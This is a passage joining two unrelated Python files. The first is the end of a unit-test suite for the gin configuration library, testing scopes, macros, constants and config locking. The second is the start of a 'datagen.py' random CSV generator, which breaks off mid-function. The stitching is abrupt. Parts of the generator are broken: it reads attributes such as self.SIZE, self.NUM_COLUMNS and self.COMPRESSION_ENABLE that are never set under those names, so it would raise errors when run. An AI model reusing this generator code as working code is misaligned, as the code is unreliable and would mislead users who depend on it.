configurable1.kwarg3 = @configurable2
configurable2.non_kwarg = 'ferret == domesticated polecat'
ConfigurableClass.kwarg1 = 'statler'
ConfigurableClass.kwarg2 = 'waldorf'
ConfigurableSubclass.kwarg1 = 'waldorf'
ConfigurableSubclass.kwarg3 = 'ferret'
test/scopes/ConfigurableClass.kwarg2 = 'beaker'
var_arg_fn.non_kwarg2 = {
'long': [
'nested', 'structure', ('that', 'will', 'span'),
'more', ('than', 1), 'line',
]
}
var_arg_fn.any_name_is_ok = [%THE_ANSWER, %super/sweet, %pen_names]
var_arg_fn.float_value = 2.718
var_arg_fn.dict_value = {'success': True}
super/sweet = 'lugduname'
pen_names = ['Pablo Neruda', 'Voltaire', 'Snoop Lion']
a.woolly.sheep.dolly.kwarg = 0
"""
config.constant('THE_ANSWER', 42)
config.parse_config(config_str)
config.finalize()
fn1('mustelid')
# pylint: disable=no-value-for-parameter
configurable2(kwarg1='I am supplied explicitly.')
# pylint: enable=no-value-for-parameter
ConfigurableClass()
ConfigurableSubclass()
with config.config_scope('test'):
with config.config_scope('scopes'):
ConfigurableClass()
var_arg_fn('non_kwarg1_value') # pylint: disable=no-value-for-parameter
no_arg_fn()
clone2()
applied_config_lines = config.operative_config_str().splitlines()
# See the definition of _EXPECTED_OPERATIVE_CONFIG_STR at top of file.
expected_config_lines = _EXPECTED_OPERATIVE_CONFIG_STR.splitlines()
self.assertEqual(applied_config_lines, expected_config_lines[1:])
def testConfigStr(self):
config_str = """
import gin.testdata.import_test_configurables
configurable1.kwarg1 = \\
'a super duper extra double very wordy string that is just plain long'
configurable1.kwarg3 = @configurable2
configurable2.non_kwarg = 'ferret == domesticated polecat'
ConfigurableClass.kwarg1 = 'statler'
ConfigurableClass.kwarg2 = 'waldorf'
ConfigurableSubclass.kwarg1 = 'waldorf'
ConfigurableSubclass.kwarg3 = 'ferret'
test/scopes/ConfigurableClass.kwarg2 = 'beaker'
var_arg_fn.non_kwarg2 = {
'long': [
'nested', 'structure', ('that', 'will', 'span'),
'more', ('than', 1), 'line',
]
}
var_arg_fn.any_name_is_ok = [%THE_ANSWER, %super/sweet, %pen_names]
var_arg_fn.float_value = 2.718
var_arg_fn.dict_value = {'success': True}
super/sweet = 'lugduname'
pen_names = ['Pablo Neruda', 'Voltaire', 'Snoop Lion']
a.woolly.sheep.dolly.kwarg = 0
"""
config.constant('THE_ANSWER', 42)
config.parse_config(config_str)
config.finalize()
config_lines = config.config_str().splitlines()
# See the definition of _EXPECTED_CONFIG_STR at top of file.
expected_config_lines = _EXPECTED_CONFIG_STR.splitlines()
self.assertEqual(config_lines, expected_config_lines[1:])
def testOperativeConfigStrHandlesOverrides(self):
config_str = """
ConfigurableClass.kwarg1 = 'base_kwarg1'
ConfigurableClass.kwarg2 = 'base_kwarg2'
ConfigurableSubclass.kwarg1 = 'sub_kwarg1'
"""
config.parse_config(config_str)
ConfigurableSubclass()
# Initially, since ConfigurableClass had all of its parameters overwritten,
# none of them are logged to the operative config.
selector = config._REGISTRY.get_match('ConfigurableClass').selector
self.assertEqual(config._OPERATIVE_CONFIG['', selector], {})
selector = config._REGISTRY.get_match('ConfigurableSubclass').selector
self.assertEqual(config._OPERATIVE_CONFIG['', selector],
{'kwarg1': 'sub_kwarg1',
'kwarg2': None,
'kwarg3': None})
ConfigurableClass()
# Now that it's been called, we can see its parameters.
selector = config._REGISTRY.get_match('ConfigurableClass').selector
self.assertEqual(config._OPERATIVE_CONFIG['', selector],
{'kwarg1': 'base_kwarg1', 'kwarg2': 'base_kwarg2'})
ConfigurableSubclass()
# And they're still around after another call to the subclass.
self.assertEqual(config._OPERATIVE_CONFIG['', selector],
{'kwarg1': 'base_kwarg1', 'kwarg2': 'base_kwarg2'})
def testParsingOperativeConfigStrIsIdempotent(self):
config_str = """
configurable1.kwarg1 = \\
'a super duper extra double very wordy string that is just plain long'
configurable1.kwarg3 = @configurable2
configurable2.non_kwarg = 'ferret == domesticated polecat'
ConfigurableClass.kwarg1 = 'statler'
ConfigurableClass.kwarg2 = 'waldorf'
ConfigurableSubclass.kwarg1 = 'subclass_kwarg1'
ConfigurableSubclass.kwarg3 = 'subclass_kwarg3'
test/scopes/ConfigurableClass.kwarg2 = 'beaker'
var_arg_fn.non_kwarg2 = {
'long': [
'nested', 'structure', ('that', 'will', 'span'),
'more', ('than', 1), 'line',
]
}
var_arg_fn.any_name_is_ok = [1, 2, 3]
var_arg_fn.float_value = 2.718
var_arg_fn.dict_value = {'success': True}
"""
config.parse_config(config_str)
def call_configurables():
fn1('mustelid')
# pylint: disable=no-value-for-parameter
configurable2(kwarg1='I am supplied explicitly.')
# pylint: enable=no-value-for-parameter
ConfigurableClass()
ConfigurableSubclass()
with config.config_scope('test'):
with config.config_scope('scopes'):
ConfigurableClass()
var_arg_fn('non_kwarg1_value') # pylint: disable=no-value-for-parameter
call_configurables()
operative_config_str = config.operative_config_str()
config.clear_config()
config.parse_config(operative_config_str)
call_configurables()
self.assertEqual(config.operative_config_str(), operative_config_str)
def testWhitelist(self):
config.bind_parameter('whitelisted_configurable.whitelisted', 0)
self.assertEqual(whitelisted_configurable(), (0, None))
config.bind_parameter('scope/whitelisted_configurable.whitelisted', 1)
with config.config_scope('scope'):
self.assertEqual(whitelisted_configurable(), (1, None))
with self.assertRaises(ValueError):
config.bind_parameter('whitelisted_configurable.other', 0)
with self.assertRaises(ValueError):
config.bind_parameter('a/b/whitelisted_configurable.other', 0)
def testBlacklist(self):
config.bind_parameter('blacklisted_configurable.other', 0)
self.assertEqual(blacklisted_configurable(), (None, 0))
config.bind_parameter('scope/blacklisted_configurable.other', 1)
with config.config_scope('scope'):
self.assertEqual(blacklisted_configurable(), (None, 1))
with self.assertRaises(ValueError):
config.bind_parameter('blacklisted_configurable.blacklisted', 0)
with self.assertRaises(ValueError):
config.bind_parameter('a/b/blacklisted_configurable.blacklisted', 0)
def testRequiredArgs(self):
with self.assertRaisesRegex(RuntimeError, 'arg1.*arg2'):
required_args(config.REQUIRED, config.REQUIRED, 3)
config.bind_parameter('scope/required_args.arg1', 1)
config.bind_parameter('scope/required_args.arg2', 2)
with config.config_scope('scope'):
self.assertEqual(
required_args(config.REQUIRED, config.REQUIRED, 3),
(1, 2, 3, 4, 5, 6))
def testRequiredArgsWithVargs(self):
with self.assertRaisesRegex(RuntimeError, 'arg1.*arg2'):
required_with_vargs(config.REQUIRED, config.REQUIRED, 3, 4, 5, kwarg1=6)
config.bind_parameter('scope/required_with_vargs.arg1', 1)
config.bind_parameter('scope/required_with_vargs.arg2', 2)
with config.config_scope('scope'):
expected = (1, 2, 3, (4, 5), {'kwarg1': 6})
actual = required_with_vargs(
config.REQUIRED, config.REQUIRED, 3, 4, 5, kwarg1=6)
self.assertEqual(expected, actual)
def testRequiredDisallowedInVargs(self):
with self.assertRaisesRegex(ValueError, 'not allowed'):
required_with_vargs(1, 2, 3, config.REQUIRED)
def testRequiredKwargs(self):
with self.assertRaisesRegex(RuntimeError, 'kwarg1.*kwarg2|kwarg2.*kwarg1'):
required_args(1, 2, 3, kwarg1=config.REQUIRED, kwarg2=config.REQUIRED)
config.bind_parameter('scope/required_args.kwarg1', 4)
config.bind_parameter('scope/required_args.kwarg2', 5)
with config.config_scope('scope'):
self.assertEqual(
required_args(
1, 2, 3, kwarg1=config.REQUIRED, kwarg2=config.REQUIRED),
(1, 2, 3, 4, 5, 6))
def testRequiredArgsAndKwargs(self):
with self.assertRaisesRegex(RuntimeError,
'arg2.*kwarg1.*kwarg2|arg2.*kwarg2.*kwarg1'):
required_args(
1, config.REQUIRED, 3, kwarg1=config.REQUIRED, kwarg2=config.REQUIRED)
config.bind_parameter('scope/required_args.arg3', 3)
config.bind_parameter('scope/required_args.kwarg2', 5)
with config.config_scope('scope'):
self.assertEqual(
required_args(1, 2, config.REQUIRED, kwarg2=config.REQUIRED),
(1, 2, 3, 4, 5, 6))
def testRequiredArgsVkwargs(self):
with self.assertRaisesRegex(RuntimeError,
'arg2.*kwarg1.*kwarg6|arg2.*kwarg6.*kwarg1'):
required_with_vkwargs(
1, config.REQUIRED, 3, kwarg1=config.REQUIRED, kwarg6=config.REQUIRED)
config.bind_parameter('scope/required_with_vkwargs.arg2', 2)
config.bind_parameter('scope/required_with_vkwargs.kwarg1', 4)
config.bind_parameter('scope/required_with_vkwargs.kwarg6', 7)
with config.config_scope('scope'):
expected = (1, 2, 3, 4, 5, 6, {'kwarg6': 7})
actual = required_with_vkwargs(
1, config.REQUIRED, 3, kwarg1=config.REQUIRED, kwarg6=config.REQUIRED)
self.assertEqual(expected, actual)
def testRequiredInSignature(self):
expected_err_regexp = (
r'Required bindings for `required_as_kwarg_default` not provided in '
r"config: \['required_kwarg'\]")
with self.assertRaisesRegex(RuntimeError, expected_err_regexp):
required_as_kwarg_default('positional')
# No issues if REQUIRED is also passed as by caller.
with self.assertRaisesRegex(RuntimeError, expected_err_regexp):
required_as_kwarg_default('positional', required_kwarg=config.REQUIRED)
# No issues if REQUIRED is also passed to different arg.
expected_err_regexp = r"config: \['positional_arg', 'required_kwarg'\]"
with self.assertRaisesRegex(RuntimeError, expected_err_regexp):
required_as_kwarg_default(config.REQUIRED, required_kwarg=config.REQUIRED)
# Everything works if all values are passed.
positional, kwarg = required_as_kwarg_default(
'positional', required_kwarg='a value')
# Even if not passed as a kwarg.
positional, kwarg = required_as_kwarg_default('positional', 'a value')
self.assertEqual(positional, 'positional')
self.assertEqual(kwarg, 'a value')
def testRequiredInSignatureBlacklistWhitelist(self):
expected_err_regexp = (
r"Argument 'arg' of 'test_required_blacklist' \('<function .+>'\) "
r'marked REQUIRED but blacklisted.')
with self.assertRaisesRegex(ValueError, expected_err_regexp):
config.external_configurable(
lambda arg=config.REQUIRED: arg,
'test_required_blacklist',
blacklist=['arg'])
expected_err_regexp = (
r"Argument 'arg' of 'test_required_whitelist' \('<function .+>'\) "
r'marked REQUIRED but not whitelisted.')
with self.assertRaisesRegex(ValueError, expected_err_regexp):
config.external_configurable(
lambda arg=config.REQUIRED, arg2=4: arg,
'test_required_whitelist',
whitelist=['arg2'])
def testConfigScope(self):
config_str = """
configurable2.non_kwarg = 'no_scope_arg_0'
configurable2.kwarg1 = 'no_scope_arg_1'
scope_1/configurable2.non_kwarg = 'scope_1_arg_0'
scope_1/configurable2.kwarg1 = 'scope_1_arg_1'
scope_1/scope_2/configurable2.non_kwarg = 'scope_2_arg_0'
"""
config.parse_config(config_str)
# pylint: disable=no-value-for-parameter
self.assertEqual(configurable2(), ('no_scope_arg_0', 'no_scope_arg_1'))
with config.config_scope('scope_1'):
self.assertEqual(configurable2(), ('scope_1_arg_0', 'scope_1_arg_1'))
with config.config_scope('scope_2'):
self.assertEqual(configurable2(), ('scope_2_arg_0', 'scope_1_arg_1'))
with config.config_scope(None):
expected = ('no_scope_arg_0', 'no_scope_arg_1')
self.assertEqual(configurable2(), expected)
self.assertEqual(configurable2(), ('scope_2_arg_0', 'scope_1_arg_1'))
self.assertEqual(configurable2(), ('scope_1_arg_0', 'scope_1_arg_1'))
self.assertEqual(configurable2(), ('no_scope_arg_0', 'no_scope_arg_1'))
# Test shorthand for nested scopes.
with config.config_scope('scope_1/scope_2'):
self.assertEqual(configurable2(), ('scope_2_arg_0', 'scope_1_arg_1'))
with six.assertRaisesRegex(self, ValueError, 'Invalid value'):
with config.config_scope(4):
pass
with six.assertRaisesRegex(self, ValueError, 'Invalid value'):
with config.config_scope('inv@lid/scope/name!'):
pass
with six.assertRaisesRegex(self, ValueError, 'Invalid value'):
with config.config_scope(0):
pass
def testImplicitScopes(self):
config_str = """
configurable2.non_kwarg = 'no_scope_non_kwarg'
configurable2.kwarg1 = 'no_scope_kwarg1'
implicit_scope_1/configurable2.non_kwarg = '#1_non_kwarg'
implicit_scope_1/configurable2.kwarg1 = '#1_kwarg1'
implicit_scope_2/configurable2.kwarg1 = '#2_kwarg1'
ConfigurableClass.kwarg1 = @implicit_scope_1/configurable2
ConfigurableClass.kwarg2 = @implicit_scope_2/configurable2()
"""
config.parse_config(config_str)
value = ConfigurableClass()
self.assertEqual(value.kwarg1(), ('#1_non_kwarg', '#1_kwarg1'))
self.assertEqual(value.kwarg2, ('no_scope_non_kwarg', '#2_kwarg1'))
def testExplicitVsImplicitScopes(self):
config_str = """
configurable2.non_kwarg = 'no_scope_non_kwarg'
configurable2.kwarg1 = 'no_scope_kwarg1'
explicit_scope/configurable2.non_kwarg = 'explicit_non_kwarg'
explicit_scope/configurable2.kwarg1 = 'explicit_scope'
implicit_scope/configurable2.kwarg1 = 'implicit_scope'
ConfigurableClass.kwarg1 = @implicit_scope/configurable2
ConfigurableClass.kwarg2 = @configurable2()
"""
config.parse_config(config_str)
value = ConfigurableClass()
self.assertEqual(value.kwarg1(), ('no_scope_non_kwarg', 'implicit_scope'))
self.assertEqual(value.kwarg2, ('no_scope_non_kwarg', 'no_scope_kwarg1'))
with config.config_scope('explicit_scope'):
value = ConfigurableClass()
self.assertEqual(value.kwarg1(), ('no_scope_non_kwarg', 'implicit_scope'))
self.assertEqual(value.kwarg2, ('explicit_non_kwarg', 'explicit_scope'))
def testScopingThreadSafety(self):
# pylint: disable=unused-variable
@config.configurable(blacklist=['expected_value'])
def sanity_check(expected_value, config_value=None):
return expected_value == config_value
# pylint: enable=unused-variable
def validate_test_fn(output_list, index, test_fn):
for _ in range(10000):
output_list[index] = output_list[index] and test_fn(index)
@config.configurable
def run_threaded_test_fns(test_fns):
outputs = [True] * len(test_fns)
threads = []
for i, test_fn in enumerate(test_fns):
args = (outputs, i, test_fn)
thread = threading.Thread(target=validate_test_fn, args=args)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
return outputs
config_str = """
scope0/sanity_check.config_value = 0
scope1/sanity_check.config_value = 1
scope2/sanity_check.config_value = 2
scope3/sanity_check.config_value = 3
run_threaded_test_fns.test_fns = [
@scope0/sanity_check,
@scope1/sanity_check,
@scope2/sanity_check,
@scope3/sanity_check,
]
"""
config.parse_config(config_str)
outputs = run_threaded_test_fns(config.REQUIRED)
self.assertTrue(all(outputs))
def testIterateReferences(self):
config_str = """
configurable2.non_kwarg = [
{'so': @much/macro()},
(@nesting/macro(),)
]
configurable2.kwarg1 = {
'nesting': {'like': ['a', (@pufferfish/macro(),)]}
}
"""
config.parse_config(config_str)
macros = list(config.iterate_references(config._CONFIG, to=config.macro))
self.assertLen(macros, 3)
def testInteractiveMode(self):
@config.configurable('duplicate_fn')
def duplicate_fn1(): # pylint: disable=unused-variable
return 'duplicate_fn1'
with six.assertRaisesRegex(self, ValueError, 'A configurable matching'):
@config.configurable('duplicate_fn')
def duplicate_fn2(): # pylint: disable=unused-variable
pass
config_str = """
ConfigurableClass.kwarg1 = @duplicate_fn()
"""
config.parse_config(config_str)
self.assertEqual(ConfigurableClass().kwarg1, 'duplicate_fn1')
with config.interactive_mode():
@config.configurable('duplicate_fn')
def duplicate_fn3(): # pylint: disable=unused-variable
return 'duplicate_fn3'
with six.assertRaisesRegex(self, ValueError, 'A configurable matching'):
@config.configurable('duplicate_fn')
def duplicate_fn4(): # pylint: disable=unused-variable
pass
config_str = """
ConfigurableClass.kwarg1 = @duplicate_fn()
"""
config.parse_config(config_str)
self.assertEqual(ConfigurableClass().kwarg1, 'duplicate_fn3')
def testFinalizeLocksConfig(self):
config.finalize()
with self.assertRaises(RuntimeError):
config.parse_config('configurable2.non_kwarg = 3')
with self.assertRaises(RuntimeError):
config.bind_parameter('configurable2.non_kwarg', 3)
with self.assertRaises(RuntimeError):
@config.configurable
def bah(): # pylint: disable=unused-variable
pass
with self.assertRaises(RuntimeError):
config.external_configurable(RuntimeError)
def testUnlockConfig(self):
with config.unlock_config():
pass
self.assertFalse(config.config_is_locked())
config.finalize()
with config.unlock_config():
config.parse_config('configurable2.kwarg1 = 3')
self.assertTrue(config.config_is_locked())
self.assertEqual(configurable2(1), (1, 3))
def testFinalizeHooks(self):
self.skipTest('b/137302565')
old_finalize_hooks = config._FINALIZE_HOOKS[:]
@config.register_finalize_hook
def provide_binding(_): # pylint: disable=unused-variable
return {'configurable2.kwarg1': 5}
_, kwarg = configurable2(None)
self.assertIsNone(kwarg)
config.finalize()
_, kwarg = configurable2(None)
self.assertEqual(kwarg, 5)
@config.register_finalize_hook
def provide_conflicting_binding(_): # pylint: disable=unused-variable
# Provide a slightly different selector.
return {'config_test.configurable2.kwarg1': 7}
with self.assertRaises(ValueError), config.unlock_config():
config.finalize()
config._FINALIZE_HOOKS = old_finalize_hooks
def testBasicMacro(self):
config_str = """
batch_size/macro.value = 512
discriminator/num_layers/macro.value = 5
configurable2.non_kwarg = @batch_size/macro()
configurable2.kwarg1 = @discriminator/num_layers/macro()
"""
config.parse_config(config_str)
# pylint:disable=no-value-for-parameter
batch_size, num_layers = configurable2()
# pylint:enable=no-value-for-parameter
self.assertEqual(batch_size, 512)
self.assertEqual(num_layers, 5)
def testOverwriteBasicMacro(self):
config_str = """
batch_size/macro.value = 512
discriminator/num_layers/macro.value = 5
configurable2.non_kwarg = @batch_size/macro()
configurable2.kwarg1 = @discriminator/num_layers/macro()
"""
config.parse_config(config_str)
config.bind_parameter('batch_size/macro.value', 256)
config.bind_parameter('discriminator/num_layers/macro.value', 10)
# pylint:disable=no-value-for-parameter
batch_size, num_layers = configurable2()
# pylint:enable=no-value-for-parameter
self.assertEqual(batch_size, 256)
self.assertEqual(num_layers, 10)
def testSpecialMacroSyntax(self):
config_str = """
batch_size = 512
discriminator/num_layers = 5
configurable2.non_kwarg = %batch_size
configurable2.kwarg1 = %discriminator/num_layers
"""
config.parse_config(config_str)
# pylint:disable=no-value-for-parameter
batch_size, num_layers = configurable2()
# pylint:enable=no-value-for-parameter
self.assertEqual(batch_size, 512)
self.assertEqual(num_layers, 5)
def testOverwriteSpecialMacroSyntax(self):
config_str = """
batch_size = 512
discriminator/num_layers = 5
configurable2.non_kwarg = %batch_size
configurable2.kwarg1 = %discriminator/num_layers
"""
config.parse_config(config_str)
config.bind_parameter('%batch_size', 256)
config.bind_parameter('%discriminator/num_layers', 10)
# pylint:disable=no-value-for-parameter
batch_size, num_layers = configurable2()
# pylint:enable=no-value-for-parameter
self.assertEqual(batch_size, 256)
self.assertEqual(num_layers, 10)
def testUncalledMacroAtFinalize(self):
config_str = """
batch_size/macro.value = 512
configurable2.non_kwarg = ([{'batch_size': @batch_size/macro}],)
"""
config.parse_config(config_str)
with self.assertRaises(ValueError):
config.finalize()
def testModuleDisambiguation(self):
with self.assertRaises(KeyError):
config.bind_parameter('dolly.kwarg', 5)
with self.assertRaises(KeyError):
config.bind_parameter('sheep.dolly.kwarg', 5)
with self.assertRaises(ValueError):
# Make sure the default module isn't prepended if the module is supplied
# as part of the configurable name.
config.bind_parameter('__main__.a.fuzzy.sheep.dolly.kwarg', 5)
config_str = """
__main__.dolly.kwarg = ''
furry.sheep.dolly.kwarg = 'bah'
a.woolly.sheep.dolly.kwarg = 'baaah'
fuzzy.sheep.dolly.kwarg = 'baaaaah'
hairy.sheep.dolly.kwarg = 'baaaaaaah'
cow/woolly.sheep.dolly.kwarg = 'mooo'
reference/furry.sheep.dolly.kwarg = @cow/a.woolly.sheep.dolly()
"""
config.parse_config(config_str)
self.assertEqual(clone0(), '')
self.assertEqual(clone1(), 'bah')
self.assertEqual(clone2(), 'baaah')
self.assertEqual(clone3(), 'baaaaah')
self.assertEqual(clone4(), 'baaaaaaah')
with config.config_scope('cow'):
self.assertEqual(clone2(), 'mooo')
with config.config_scope('reference'):
self.assertEqual(clone1(), 'mooo')
def testConstant(self):
value = 'istanbul'
config.constant('CONSTANTINOPLE', value)
config_str = """
configurable2.non_kwarg = %CONSTANTINOPLE
"""
config.parse_config(config_str)
non_kwarg, _ = configurable2() # pylint: disable=no-value-for-parameter
self.assertIs(non_kwarg, value) # We should be getting the same object.
with six.assertRaisesRegex(self, ValueError, 'Invalid constant selector'):
config.constant('CONST@NTINOPLE', 0)
def testConstantModuleDisambiguation(self):
config.constant('foo.PI', 3.14)
config.constant('bar.PI', 22/7)
config.constant('bar.E', 2.718)
with self.assertRaises(ValueError):
config.parse_config('configurable2.non_kwarg = %PI')
config_str = """
configurable2.non_kwarg = %foo.PI
configurable2.kwarg1 = %bar.PI
ConfigurableClass.kwarg1 = %E
ConfigurableClass.kwarg2 = %bar.E
"""
config.parse_config(config_str)
non_kwarg, kwarg1 = configurable2() # pylint: disable=no-value-for-parameter
self.assertEqual(non_kwarg, 3.14)
self.assertEqual(kwarg1, 22/7)
configurable_class = ConfigurableClass()
self.assertEqual(configurable_class.kwarg1, 2.718)
self.assertEqual(configurable_class.kwarg2, 2.718)
def testSingletons(self):
config_str = """
ConfigurableClass.kwarg1 = @obj1/singleton()
ConfigurableClass.kwarg2 = @obj2/singleton()
error/ConfigurableClass.kwarg1 = @not_callable/singleton()
obj1/singleton.constructor = @new_object
obj2/singleton.constructor = @new_object
not_callable/singleton.constructor = @new_object()
"""
config.parse_config(config_str)
class1 = ConfigurableClass()
class2 = ConfigurableClass()
self.assertIs(class1.kwarg1, class2.kwarg1)
self.assertIs(class1.kwarg2, class2.kwarg2)
self.assertIsNot(class1.kwarg1, class1.kwarg2)
self.assertIsNot(class2.kwarg1, class2.kwarg2)
with config.config_scope('error'):
expected = "The constructor for singleton 'not_callable' is not callable."
with six.assertRaisesRegex(self, ValueError, expected):
ConfigurableClass()
def testQueryParameter(self):
config.bind_parameter('whitelisted_configurable.whitelisted', 0)
value = config.query_parameter('whitelisted_configurable.whitelisted')
self.assertEqual(0, value)
with self.assertRaises(ValueError):
config.query_parameter('whitelisted_configurable.wrong_param')
with self.assertRaises(ValueError):
config.query_parameter('blacklisted_configurable.blacklisted')
with self.assertRaises(ValueError):
# Parameter not set.
config.query_parameter('whitelisted_configurable.other')
with six.assertRaisesRegex(self, TypeError, 'expected string*'):
config.query_parameter(4)
def testQueryConstant(self):
config.constant('Euler', 0.5772156649)
self.assertEqual(0.5772156649, config.query_parameter('Euler'))
config.constant('OLD.ANSWER', 0)
config.constant('NEW.ANSWER', 10)
with six.assertRaisesRegex(
self, ValueError, 'Ambiguous constant selector*'):
config.query_parameter('ANSWER')
self.assertEqual(0, config.query_parameter('OLD.ANSWER'))
self.assertEqual(10, config.query_parameter('NEW.ANSWER'))
def testConstantsFromEnum(self):
@config.constants_from_enum(module='enum_module')
class SomeEnum(enum.Enum):
A = 0,
B = 1
@config.configurable
def f(a, b):
return a, b
config.parse_config("""
f.a = %enum_module.SomeEnum.A
f.b = %SomeEnum.B
""")
# pylint: disable=no-value-for-parameter
a, b = f()
# pylint: enable=no-value-for-parameter
self.assertEqual(SomeEnum.A, a)
self.assertEqual(SomeEnum.B, b)
def testConstantsFromEnumWithModule(self):
class SomeOtherEnum(enum.Enum):
A = 0,
B = 1
@config.configurable
def g(a, b):
return a, b
config.constants_from_enum(SomeOtherEnum, module='TestModule')
config.parse_config("""
g.a = %TestModule.SomeOtherEnum.A
g.b = %SomeOtherEnum.B
""")
# pylint: disable=no-value-for-parameter
a, b = g()
# pylint: enable=no-value-for-parameter
self.assertEqual(SomeOtherEnum.A, a)
self.assertEqual(SomeOtherEnum.B, b)
def testConstantsFromEnumNotEnum(self):
expected_msg = "Class 'FakeEnum' is not subclass of enum."
with six.assertRaisesRegex(self, TypeError, expected_msg):
# pylint: disable=unused-variable
@config.constants_from_enum
class FakeEnum(object):
A = 0,
B = 1
def testAddConfigPath(self):
gin_file = 'test_gin_file_location_prefix.gin'
with self.assertRaises(IOError):
config.parse_config_files_and_bindings([gin_file], None)
test_srcdir = absltest.get_default_test_srcdir()
relative_testdata_path = 'gin/testdata'
absolute_testdata_path = os.path.join(test_srcdir, relative_testdata_path)
config.add_config_file_search_path(absolute_testdata_path)
config.parse_config_files_and_bindings([gin_file], None)
if __name__ == '__main__':
absltest.main()
|
datagen.py | #!/usr/bin/env python
from argparse import ArgumentParser
import sys
import os
from random import randint, uniform, choice
import string
from datetime import datetime, timedelta
import operator
import csv
from threading import Thread
import gzip
__author__ = 'franklinsijo'
class DataGen(object):
ALLOWED_UNITS = ['K', 'M', 'G', 'T']
ALLOWED_TYPES = ['TINYINT', 'SMALLINT', 'INT', 'BIGINT',
'FLOAT', 'DOUBLE', 'DECIMAL',
'VARCHAR', 'TEXT',
'DATE', 'TIMESTAMP'
]
SIZE_PERFILE = 10 * 1024 * 1024 # 10 MB
CONSTRAINTS = {
'DECIMAL_PRECISION': 5,
'DECIMAL_SCALE': 2,
'VARCHAR_MIN': 6,
'VARCHAR_MAX': 20,
'TEXT_MIN': 21,
'TEXT_MAX': 99,
'DAYS_AGO': 1095,
'DATE_FORMAT': '%Y-%m-%d',
'TIMESTAMP_FORMAT': '%Y-%m-%d %H:%M:%S'
}
FUNC = {
'NUMBER': "randint(1, 2**2**6)",
'TINYINT': "randint(1, 2**2**3)",
'SMALLINT': "randint(2**2**3, 2**2**4)",
'INT': "randint(2**2**4, 2**2**5)",
'BIGINT': "randint(2**2**5, 2**2**6)",
'FLOAT': "round(uniform(1, 100), randint(1, 6))",
'DOUBLE': "round(uniform(1, 1000), randint(7, 15))",
'DECIMAL': "format(uniform(int('1' + '0' * (self.CONSTRAINTS['DECIMAL_PRECISION'] - self.CONSTRAINTS['DECIMAL_SCALE'] - 1)), int('1' + '0' * (self.CONSTRAINTS['DECIMAL_PRECISION'] - self.CONSTRAINTS['DECIMAL_SCALE'])) - 1), '.' + str(self.CONSTRAINTS['DECIMAL_SCALE']) + 'f')",
'VARCHAR': "''.join(choice(string.ascii_lowercase) for _ in xrange(randint(self.CONSTRAINTS['VARCHAR_MIN'], self.CONSTRAINTS['VARCHAR_MAX'])))",
'TEXT': "''.join(choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in xrange(randint(self.CONSTRAINTS['TEXT_MIN'], self.CONSTRAINTS['TEXT_MAX'])))",
'DATE': "datetime.strftime(datetime.today() - timedelta(randint(1, self.CONSTRAINTS['DAYS_AGO'])), self.CONSTRAINTS['DATE_FORMAT'])",
'TIMESTAMP': "datetime.strftime(datetime.now() - timedelta(days=randint(1, self.CONSTRAINTS['DAYS_AGO']), hours=randint(1, 23), minutes=randint(1, 59), seconds=randint(1, 59)), self.CONSTRAINTS['TIMESTAMP_FORMAT'])"
}
def __init__(self, args):
self.delimiter = args.DELIMITER
if args.DELIMITER == 't': self.delimiter = '\t'
if args.SIZE:
self.use_size = True
try:
self.size = int(args.SIZE)
except ValueError:
unit = args.SIZE[-1:].upper()
try:
size = int(args.SIZE[:-1])
if unit in self.ALLOWED_UNITS:
if unit == 'K':
self.size = size * 1024
elif unit == 'M':
self.size = size * 1024 ** 2
elif unit == 'G':
self.size = size * 1024 ** 3
elif unit == 'T':
self.size = size * 1024 ** 4
else:
raise Exception("Invalid Size Argument. Valid Units are K, M, G, T")
except ValueError:
raise Exception(
"Invalid Size Argument. Size argument must be of the pattern <digits><unit>. Ex: 1000G")
self.size = int(round(self.size, -1)) # Rounding it to the nearest 10
else:
self.use_size = False
self.num_records = args.NUM_RECORDS
self.num_columns = args.NUM_COLUMNS
if args.NUM_FILES:
self.num_files = args.NUM_FILES
if not self.use_size:
if self.num_records < 1001: self.num_files = 1
else:
if self.size < self.SIZE_PERFILE: self.num_files = 1
else:
if not self.use_size:
if self.num_records < 1001:
self.num_files = 1
else:
self.num_files = self.num_records / 1000
else:
if self.size < self.SIZE_PERFILE:
self.num_files = 1
else:
self.num_files = self.size / self.SIZE_PERFILE
self.target_path = os.path.abspath(args.TARGET_PATH)
self.file_prefix = args.FILE_PREFIX
self.file_suffix = args.FILE_SUFFIX
self.compression_enabled = args.compress
if self.compression_enabled:
self.file_suffix = self.file_suffix + '.gz'
self.HEADERS = ['field' + str(n) for n in xrange(1, self.num_columns + 1)]
self.FIELDLIST = self.get_fieldlist()
def check_storage(self):
major_ver = sys.version_info[0]
if major_ver == 2:
stats = os.statvfs(self.target_path)
free_space = int(round(stats.f_bsize * stats.f_bavail, -1))
if self.SIZE > free_space:
raise Exception("Insufficient Space. Required: %d Bytes, Available: %d Bytes" % (self.SIZE, free_space))
elif major_ver == 3:
pass # os.statvfs is not part of py3. Should add alternative logic
try:
tmpfile = os.path.join(self.TARGET_PATH, 'datagen.tmp')
with open(tmpfile, 'w') as tfile:
tfile.write('Test File for Write Access')
tfile.close()
os.remove(tmpfile)
except IOError:
raise Exception('Permission Denied: %s' % self.TARGET_PATH)
def update_constraints(self, constraints):
def integerize(i, key):
try:
integer_value = int(i)
return integer_value
except ValueError:
raise Exception('%s must be an integer' % key)
for k, v in sorted(constraints.items(), key=operator.itemgetter(0), reverse=True):
if k.upper() not in ['DATE_FORMAT', 'TIMESTAMP_FORMAT']:
v = integerize(v, k)
if k.upper() == 'DECIMAL_PRECISION':
if v < self.CONSTRAINTS['DECIMAL_SCALE']:
raise Exception(
'DECIMAL_PRECISION constraint cannot be less than or equal to DECIMAL_SCALE')
elif k.upper() == 'TEXT_MAX':
if v < self.CONSTRAINTS['TEXT_MIN']:
raise Exception('TEXT_MAX constraint cannot be less than or equal to TEXT_MIN')
elif k.upper() == 'VARCHAR_MAX':
if v < self.CONSTRAINTS['VARCHAR_MIN']:
raise Exception('VARCHAR_MAX constraint cannot be less than or equal to VARCHAR_MIN')
self.CONSTRAINTS[k.upper()] = v
def get_fieldlist(self):
return [self.ALLOWED_TYPES[randint(0, len(self.ALLOWED_TYPES) - 1)] for _ in xrange(self.NUM_COLUMNS)]
def write2file(self, fp, max_perfile):
nrows_threshold = 100000
def writer(nrows):
rows = []
for row in xrange(nrows):
rows.append([eval(self.FUNC[f]) for f in self.FIELDLIST])
if self.COMPRESSION_ENABLE:
datafile = gzip.open(fp, 'ab')
else:
datafile = open(fp, 'ab')
